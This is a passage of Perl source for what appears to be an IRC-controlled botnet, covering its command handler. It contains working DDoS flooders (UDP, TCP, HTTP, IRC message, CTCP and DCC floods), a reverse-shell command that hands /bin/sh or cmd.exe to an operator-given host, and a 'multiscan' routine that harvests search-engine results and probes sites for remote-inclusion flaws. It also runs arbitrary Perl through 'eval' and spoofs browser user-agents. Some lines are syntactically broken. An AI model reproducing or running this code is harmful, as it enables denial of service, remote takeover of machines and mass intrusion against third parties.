  2086. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3MSGFlood12]14 Excecuted on ".$1." ");
  2087.  
  2088. }
  2089.  
  2090.  
  2091.  
  2092. # dccflood, @dccflood <who>
  2093.  
  2094. if ($funcarg =~ /^dccflood (.*)/) {
  2095.  
  2096. for($i=0; $i<=10; $i+=1){
  2097.  
  2098. sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001DCC CHAT chat 1121485131 1024\001\n");
  2099.  
  2100. }
  2101.  
  2102. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3DCCFlood12]14 Excecuted on ".$1." ");
  2103.  
  2104. }
  2105.  
  2106. # ctcpflood, @ctcpflood <who>
  2107.  
  2108. if ($funcarg =~ /^ctcpflood (.*)/) {
  2109.  
  2110. for($i=0; $i<=10; $i+=1){
  2111.  
  2112. sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n");
  2113.  
  2114. sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n");
  2115.  
  2116. }
  2117.  
  2118. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3CTCPFlood12]14 Excecuted on ".$1." ");
  2119.  
  2120. }
  2121.  
  2122. # noticeflood, @noticeflood <who>
  2123.  
  2124. if ($funcarg =~ /^noticeflood (.*)/) {
  2125.  
  2126. for($i=0; $i<=10; $i+=1){
  2127.  
  2128. sendraw($IRC_cur_socket, "NOTICE ".$1." :w3tFL00D\n");
  2129.  
  2130. }
  2131.  
  2132. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3NoticeFlood12]14 Excecuted on ".$1." ");
  2133.  
  2134. }
  2135.  
  2136. # Channel Flood, @channelflood
  2137.  
  2138. if ($funcarg =~ /^channelflood/) {
  2139.  
  2140. for($i=0; $i<=25; $i+=1){
  2141.  
  2142. sendraw($IRC_cur_socket, "JOIN #".(int(rand(99999))) );
  2143.  
  2144. }
  2145.  
  2146. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3ChannelFlood12]14 Excecuted ");
  2147.  
  2148. }
  2149.  
  2150. # Maxi Flood, @maxiflood
  2151.  
  2152. if ($funcarg =~ /^maxiflood(.*)/) {
  2153.  
  2154. for($i=0; $i<=15; $i+=1){
  2155.  
  2156. sendraw($IRC_cur_socket, "NOTICE ".$1." :Iyzan_Loves_you,_;)\n");
  2157.  
  2158. sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n");
  2159.  
  2160. sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n");
  2161.  
  2162. sendraw($IRC_cur_socket, "PRIVMSG ".$1." :Iyzan_Loves_you,_;\n");
  2163.  
  2164. }
  2165.  
  2166. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3M4Xi-Fl00d12]14 Excecuted on ".$1." ");
  2167.  
  2168. }
  2169.  
  2170. ######################
  2171.  
  2172. # irc #
  2173.  
  2174. ######################
  2175.  
  2176. if ($funcarg =~ /^reset/) {
  2177.  
  2178. sendraw($IRC_cur_socket, "QUIT :");
  2179.  
  2180. }
  2181.  
  2182. if ($funcarg =~ /^join (.*)/) {
  2183.  
  2184. sendraw($IRC_cur_socket, "JOIN ".$1);
  2185.  
  2186. }
  2187.  
  2188. if ($funcarg =~ /^part (.*)/) {
  2189.  
  2190. sendraw($IRC_cur_socket, "PART ".$1);
  2191.  
  2192. }
  2193.  
  2194. if ($funcarg =~ /^voice (.*)/) {
  2195.  
  2196. sendraw($IRC_cur_socket, "MODE $printl +v ".$1);
  2197.  
  2198. }
  2199.  
  2200. if ($funcarg =~ /^devoice (.*)/) {
  2201.  
  2202. sendraw($IRC_cur_socket, "MODE $printl -v ".$1);
  2203.  
  2204. }
  2205.  
  2206. if ($funcarg =~ /^halfop (.*)/) {
  2207.  
  2208. sendraw($IRC_cur_socket, "MODE $printl +h ".$1);
  2209.  
  2210. }
  2211.  
  2212. if ($funcarg =~ /^dehalfop (.*)/) {
  2213.  
  2214. sendraw($IRC_cur_socket, "MODE $printl -h ".$1);
  2215.  
  2216. }
  2217.  
  2218. if ($funcarg =~ /^owner (.*)/) {
  2219.  
  2220. sendraw($IRC_cur_socket, "MODE $printl +q ".$1);
  2221.  
  2222. }
  2223.  
  2224. if ($funcarg =~ /^deowner (.*)/) {
  2225.  
  2226. sendraw($IRC_cur_socket, "MODE $printl -q ".$1);
  2227.  
  2228. }
  2229.  
  2230. if ($funcarg =~ /^op (.*)/) {
  2231.  
  2232. sendraw($IRC_cur_socket, "MODE $printl +o ".$1);
  2233.  
  2234. }
  2235.  
  2236. if ($funcarg =~ /^deop (.*)/) {
  2237.  
  2238. sendraw($IRC_cur_socket, "MODE $printl -o ".$1);
  2239.  
  2240. }
  2241.  
  2242. ######################
  2243.  
  2244. #End of Join And Part#
  2245.  
  2246. ######################
  2247.  
  2248.  
  2249.  
  2250. ######################
  2251.  
  2252. # UDPFlood #
  2253.  
  2254. ######################
  2255.  
  2256. if ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
  2257.  
  2258. sendraw($IRC_cur_socket, "PRIVMSG $printl :13[4#3UDP13] -> Ataque Iniciado No IP4 ".$1.":".$2." 13Por 4 ".$3." 13Segundos.");
  2259.  
  2260. $iaddr = inet_aton("$1") or die "Fuck wrong ip";
  2261.  
  2262. $endtime = time() + ($3 ? $3 : 1000000);
  2263.  
  2264. socket(flood, PF_INET, SOCK_DGRAM, 17);
  2265.  
  2266. $port = "80";
  2267.  
  2268. for (;time() <= $endtime;) {
  2269.  
  2270. $2 = $2 ? $2 : int(rand(1024-64)+64) ;
  2271.  
  2272. $port = $port ? $port : int(rand(65500))+1;
  2273.  
  2274. send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($2, $iaddr));}
  2275.  
  2276. sendraw($IRC_cur_socket,"PRIVMSG $printl :13[4#3UDP13] Ataque Finalizado Com Sucesso! 4 ".$1.":".$2.".");
  2277.  
  2278. }
  2279.  
  2280. ######################
  2281.  
  2282. # TCPFlood #
  2283.  
  2284. ######################
  2285.  
  2286.  
  2287.  
  2288. if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  2289.  
  2290. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3TCP-DDOS12] Attacking 4 ".$1.":".$2." 12for 4 ".$3." 12seconds.");
  2291.  
  2292. my $itime = time;
  2293.  
  2294. my ($cur_time);
  2295.  
  2296. $cur_time = time - $itime;
  2297.  
  2298. while ($3>$cur_time){
  2299.  
  2300. $cur_time = time - $itime;
  2301.  
  2302. &tcpflooder("$1","$2","$3");
  2303.  
  2304. }
  2305.  
  2306. sendraw($IRC_cur_socket,"PRIVMSG $printl :12[4@3TCP-DDOS12] Attack done 4 ".$1.":".$2.".");
  2307.  
  2308. }
  2309.  
  2310. ######################
  2311.  
  2312. # End of TCPFlood #
  2313.  
  2314. ######################
  2315.  
  2316. ######################
  2317.  
  2318. # SQL Fl00dEr #
  2319.  
  2320. ######################
  2321.  
  2322. if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
  2323.  
  2324. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3SQL-DDOS12] Attacking 4 ".$1." 12 on port 3306 for 4 ".$2." 12 seconds .");
  2325.  
  2326. my $itime = time;
  2327.  
  2328. my ($cur_time);
  2329.  
  2330. $cur_time = time - $itime;
  2331.  
  2332. while ($2>$cur_time){
  2333.  
  2334. $cur_time = time - $itime;
  2335.  
  2336. my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
  2337.  
  2338. print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
  2339.  
  2340. close($socket);
  2341.  
  2342. }
  2343.  
  2344. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3SQL-DDOS12] Attacking done 4 ".$1.".");
  2345.  
  2346. }
  2347.  
  2348. ######################
  2349.  
  2350. # Back Connect #
  2351.  
  2352.  
  2353.  
  2354. ######################
  2355.  
  2356. if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
  2357.  
  2358. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Back-Connect12]:::... I don't know, I'm watching a show tho");
  2359.  
  2360.  
  2361.  
  2362. }
  2363.  
  2364. if ($funcarg =~ /^shhcon\s+(.*)\s+(\d+)/) {
  2365.  
  2366. my $host = "$1";
  2367.  
  2368. my $porta = "$2";
  2369.  
  2370. my $proto = getprotobyname('tcp');
  2371.  
  2372. my $iaddr = inet_aton($host);
  2373.  
  2374. my $paddr = sockaddr_in($porta, $iaddr);
  2375.  
  2376. my $zr = "/bin/sh -i";
  2377.  
  2378. if ($^O eq "MSWin32") {
  2379.  
  2380. $zr = "cmd.exe";
  2381.  
  2382. }
  2383.  
  2384. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
  2385.  
  2386. connect(SOCKET, $paddr) or die "connect: $!";
  2387.  
  2388. open(STDIN, ">&SOCKET");
  2389.  
  2390. open(STDOUT, ">&SOCKET");
  2391.  
  2392. open(STDERR, ">&SOCKET");
  2393.  
  2394. system("$zr");
  2395.  
  2396. close(STDIN);
  2397.  
  2398. close(STDOUT);
  2399.  
  2400. close(STDERR);
  2401.  
  2402. if ($estatisticas){
  2403.  
  2404. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Back-Connect12] Connecting to 4 $host:$porta");
  2405.  
  2406. }
  2407.  
  2408. }
  2409.  
  2410. ######################
  2411.  
  2412. #End of Back Connect#
  2413.  
  2414. ######################
  2415.  
  2416. ######################
  2417.  
  2418. # MULTI SCANNER #
  2419.  
  2420. ######################
  2421.  
  2422. if ($funcarg =~ /^multiscan\s+(.*?)\s+(.*)/){
  2423.  
  2424. if (my $pid = fork) {
  2425.  
  2426. waitpid($pid, 0);
  2427.  
  2428. } else {
  2429.  
  2430. if (fork) {
  2431.  
  2432. exit;
  2433.  
  2434. } else {
  2435.  
  2436. my $bug=$1;
  2437.  
  2438. my $dork=$2;
  2439.  
  2440. my $contatore=0;
  2441.  
  2442. my ($type,$space);
  2443.  
  2444. my %hosts;
  2445.  
  2446. ### Start Message
  2447.  
  2448. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Multi-Scan12] Starting Scan for 4$bug $dork");
  2449.  
  2450. sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3Multi-Scan12] Initializing on 45 12Search Engines ");
  2451.  
  2452. ### End of Start Message
  2453.  
  2454. # Starting Google
  2455.  
  2456. my @glist=&google($dork);
  2457.  
  2458. sendraw($IRC_cur_socket, "PRIVMSG $printl 7[4@3Multi-Scan12] 2G4o8o2g3l4e 7[".scalar(@glist)."7] Sites");
  2459.  
  2460. my @mlist=&msn($dork);
  2461.  
  2462. my @asklist=&ask($dork);
  2463.  
  2464. my @allist=&alltheweb($dork);
  2465.  
  2466. my @aollist=&aol($dork);
  2467.  
  2468. my @lycos=&lycos($dork);
  2469.  
  2470. my @ylist=&yahoo($dork);
  2471.  
  2472. my @mzlist=&mozbot($dork);
  2473.  
  2474. my @mamalist&mamma($dork);
  2475.  
  2476. my @hlist=&hotbot($dork);
  2477.  
  2478. my @altlist=&altavista($dork);
  2479.  
  2480. my @slist=&search($dork);
  2481.  
  2482. my @ulist=&uol($dork);
  2483.  
  2484. my @fireball=&fireball($dork);
  2485.  
  2486. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 2G4o8o2g3l4e 7[".scalar(@glist)."7] Sites");
  2487.  
  2488. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 MSN 7[".scalar(@mlist)."7] Sites");
  2489.  
  2490. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 AllTheWeb 7[".scalar(@allist)."7] Sites");
  2491.  
  2492. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 Ask.com 7[".scalar(@asklist)."7] Sites");
  2493.  
  2494. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 AOL 7[".scalar(@aollist)."7] Sites");
  2495.  
  2496. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 Lycos 7[".scalar(@lycos)."7] Sites");
  2497.  
  2498. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 Yahoo! 7[".scalar(@ylist)."7] Sites");
  2499.  
  2500. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 MozBot 7[".scalar(@mzlist)."7] Sites");
  2501.  
  2502. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 Mama 7[".scalar(@mamalist)."7] Sites");
  2503.  
  2504. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 HotBot 7[".scalar(@hlist)."7] Sites");
  2505.  
  2506. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 Altavista 7[".scalar(@altlist)."7] Sites");
  2507.  
  2508. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 Search[dot]com 7[".scalar(@slist)."7] Sites");
  2509.  
  2510. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 UoL 7[".scalar(@ulist)."7] Sites");
  2511.  
  2512. sendraw($IRC_cur_socket, "PRIVMSG $printl :4[4@3Multi-Scan12]12 FireBall 7[".scalar(@flist)."7] Sites");
  2513.  
  2514. #
  2515.  
  2516. push(my @tot, @glist, @mlist, @alist, @allist, @asklist, @aollist, @lycos, @ylist, @mzlist, @mamalist, @hlist,@altlist, @slist, @ulist, @flist );
  2517.  
  2518. my @puliti=&unici(@tot);
  2519.  
  2520. sendraw($IRC_cur_socket, "PRIVMSG $printl 7[4@3Multi-Scan12] Results: Total:7[".scalar(@tot)."7] Sites and Cleaned: 7[".scalar(@puliti)."7] for $dork ");
  2521.  
  2522. my $uni=scalar(@puliti);
  2523.  
  2524. foreach my $sito (@puliti)
  2525.  
  2526. {
  2527.  
  2528. $contatore++;
  2529.  
  2530. if ($contatore %100==0){
  2531.  
  2532. sendraw($IRC_cur_socket, "PRIVMSG $printl 7[4@3Multi-Scan12] Exploiting 7[".$contatore."7] of 7[".$uni. "7] Sites");
  2533.  
  2534. }
  2535.  
  2536. if ($contatore==$uni-1){
  2537.  
  2538. sendraw($IRC_cur_socket, "PRIVMSG $printl 7[4@3Multi-Scan12] Finished for $dork");
  2539.  
  2540. }
  2541.  
  2542. ### Print CMD and TEST CMD###
  2543.  
  2544. my $test="http://".$sito.$bug.$id."?";
  2545.  
  2546. my $print="http://".$sito.$bug.$cmd."?";
  2547.  
  2548. ### End of Print CMD and TEST CMD###
  2549.  
  2550. my $req=HTTP::Request->new(GET=>$test);
  2551.  
  2552. my $ua=LWP::UserAgent->new();
  2553.  
  2554. $ua->timeout(4);
  2555.  
  2556. my $response=$ua->request($req);
  2557.  
  2558. if ($response->is_success) {
  2559.  
  2560. my $re=$response->content;
  2561.  
  2562. if($re =~ /Mic22/ && $re =~ /uid=/){
  2563.  
  2564. my $hs=geths($print); $hosts{$hs}++;
  2565.  
  2566. if($hosts{$hs}=="1"){
  2567.  
  2568. sendraw($IRC_cur_socket, "PRIVMSG $printl 7[4@3Multi-Scan12] Safe Mode = OFF :. | Vuln: $print ");
  2569.  
  2570. }}
  2571.  
  2572. elsif($re =~ /Mic22/)
  2573.  
  2574. {
  2575.  
  2576. my $hs=geths($print); $hosts{$hs}++;
  2577.  
  2578. if($hosts{$hs}=="1"){
  2579.  
  2580. sendraw($IRC_cur_socket, "PRIVMSG $printl 7[4@3Multi-Scan12] Safe Mode = ON :. | Vuln: $print ");
  2581.  
  2582. }}
  2583.  
  2584. }}}
  2585.  
  2586. exit;
  2587.  
  2588. }}}
  2589.  
  2590. ######################
  2591.  
  2592. #End of MultiSCANNER #
  2593.  
  2594. ######################
  2595.  
  2596. ######################
  2597.  
  2598. # HTTPFlood #
  2599.  
  2600. ######################
  2601.  
  2602. if ($funcarg =~ /^dr0x.http\s+(.*)\s+(\d+)/) {
  2603.  
  2604. sendraw($IRC_cur_socket, "PRIVMSG $printl :5[4#3DR0X.HTTP5]12 ATTACKING 4 ".$1." 12 ON PORT 80 FOR 4 ".$2." 12 SECONDS .");
  2605.  
  2606. my $itime = time;
  2607.  
  2608. my ($cur_time);
  2609.  
  2610. $cur_time = time - $itime;
  2611.  
  2612. while ($2>$cur_time){
  2613.  
  2614. $cur_time = time - $itime;
  2615.  
  2616. my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
  2617.  
  2618. print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
  2619.  
  2620. close($socket);
  2621.  
  2622. }
  2623.  
  2624. sendraw($IRC_cur_socket, "PRIVMSG $printl :5[4#3DR0X.HTTP5]12 ATTACK DONE. 4 ".$1.".");
  2625.  
  2626. }
  2627.  
  2628. ######################
  2629.  
  2630. # End of HTTPFlood #
  2631.  
  2632. ######################
  2633.  
  2634.  
  2635. ##### INICIO DO LAYER 7 ATTACKER
  2636.  
  2637.  
  2638.  
  2639.  
  2640.  
  2641.  
  2642. ######################
  2643.  
  2644. # UDPFlood #
  2645.  
  2646. ######################
  2647.  
  2648. if ($funcarg =~ /^dr0x.udp\s+(.*)\s+(\d+)\s+(\d+)/) {
  2649.  
  2650. sendraw($IRC_cur_socket, "PRIVMSG $printl :5[4#3DR0X.UDP5]5 ATTACK STARTED. 12 HOST: 4 ".$1." 12 PACKAGES: 4 ".$2." 12 SECONDS: 4 ".$3." 12. 13 BY W1CK ");
  2651.  
  2652. my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
  2653.  
  2654. $dtime = 1 if $dtime == 0;
  2655.  
  2656. my %bytes;
  2657.  
  2658. $bytes{igmp} = $2 * $pacotes{igmp};
  2659.  
  2660. $bytes{icmp} = $2 * $pacotes{icmp};
  2661.  
  2662. $bytes{o} = $2 * $pacotes{o};
  2663.  
  2664. $bytes{udp} = $2 * $pacotes{udp};
  2665.  
  2666. $bytes{tcp} = $2 * $pacotes{tcp};
  2667.  
  2668. sendraw($IRC_cur_socket, "PRIVMSG $printl :5[4#3DR0X.UDP5]12 12RESULT: 4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12MBPS SENDED FOR4 ".$dtime." 12SECONDS, TO4 ".$1.". 13 BY W1CK ");
  2669.  
  2670. }
  2671.  
  2672. ######################
  2673.  
  2674. # End of Udpflood #
  2675.  
  2676. ######################
  2677.  
  2678. exit;
  2679.  
  2680. }
  2681.  
  2682. }
  2683.  
  2684.  
  2685.  
  2686. sub ircase {
  2687.  
  2688. my ($kem, $printl, $case) = @_;
  2689.  
  2690. if ($case =~ /^join (.*)/) {
  2691.  
  2692. j("$1");
  2693.  
  2694. }
  2695.  
  2696. if ($case =~ /^part (.*)/) {
  2697.  
  2698. p("$1");
  2699.  
  2700. }
  2701.  
  2702. if ($case =~ /^rejoin\s+(.*)/) {
  2703.  
  2704. my $chan = $1;
  2705.  
  2706. if ($chan =~ /^(\d+) (.*)/) {
  2707.  
  2708. for (my $ca = 1; $ca <= $1; $ca++ ) {
  2709.  
  2710. p("$2");
  2711.  
  2712. j("$2");
  2713.  
  2714. }
  2715.  
  2716. } else {
  2717.  
  2718. p("$chan");
  2719.  
  2720. j("$chan");
  2721.  
  2722. }
  2723.  
  2724. }
  2725.  
  2726.  
  2727.  
  2728. if ($case =~ /^op/) {
  2729.  
  2730. op("$printl", "$kem") if $case eq "op";
  2731.  
  2732. my $oarg = substr($case, 3);
  2733.  
  2734. op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  2735.  
  2736. }
  2737.  
  2738.  
  2739.  
  2740. if ($case =~ /^deop/) {
  2741.  
  2742. deop("$printl", "$kem") if $case eq "deop";
  2743.  
  2744. my $oarg = substr($case, 5);
  2745.  
  2746. deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  2747.  
  2748. }
  2749.  
  2750.  
  2751.  
  2752. if ($case =~ /^msg\s+(\S+) (.*)/) {
  2753.  
  2754. msg("$1", "$2");
  2755.  
  2756. }
  2757.  
  2758.  
  2759.  
  2760. if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  2761.  
  2762. for (my $cf = 1; $cf <= $1; $cf++) {
  2763.  
  2764. msg("$2", "$3");
  2765.  
  2766. }
  2767.  
  2768. }
  2769.  
  2770.  
  2771.  
  2772. if ($case =~ /^ctcp\s+(\S+) (.*)/) {
  2773.  
  2774. ctcp("$1", "$2");
  2775.  
  2776. }
  2777.  
  2778.  
  2779.  
  2780. if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  2781.  
  2782. for (my $cf = 1; $cf <= $1; $cf++) {
  2783.  
  2784. ctcp("$2", "$3");
  2785.  
  2786. }
  2787.  
  2788. }
  2789.  
  2790.  
  2791.  
  2792. if ($case =~ /^nick (.*)/) {
  2793.  
  2794. nick("$1");
  2795.  
  2796. }
  2797.  
  2798.  
  2799.  
  2800. if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
  2801.  
  2802. conectar("$2", "$1", 6667);
  2803.  
  2804. }
  2805.  
  2806.  
  2807.  
  2808. if ($case =~ /^raw (.*)/) {
  2809.  
  2810. sendraw("$1");
  2811.  
  2812. }
  2813.  
  2814.  
  2815.  
  2816. if ($case =~ /^eval (.*)/) {
  2817.  
  2818. eval "$1";
  2819.  
  2820. }
  2821.  
  2822. }
  2823.  
  2824.  
  2825.  
  2826. sub get_html() {
  2827.  
  2828. $test=$_[0];
  2829.  
  2830.  
  2831.  
  2832. $ip=$_[1];
  2833.  
  2834. $port=$_[2];
  2835.  
  2836.  
  2837.  
  2838. my $req=HTTP::Request->new(GET=>$test);
  2839.  
  2840. my $ua=LWP::UserAgent->new();
  2841.  
  2842. if(defined($ip) && defined($port)) {
  2843.  
  2844. $ua->proxy("http","http://$ip:$port/");
  2845.  
  2846. $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  2847. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  2848. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  2849. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  2850. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  2851. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  2852. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  2853. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  2854. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  2855. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  2856. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  2857. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  2858. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  2859. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  2860. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  2861. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  2862. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  2863. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  2864. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  2865. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  2866. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  2867. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  2868. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  2869. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  2870. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  2871. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  2872. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  2873. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  2874. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  2875. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  2876. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  2877. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  2878. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  2879. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  2880. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  2881. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  2882. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  2883. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  2884. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  2885. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  2886. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  2887. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  2888. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  2889. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
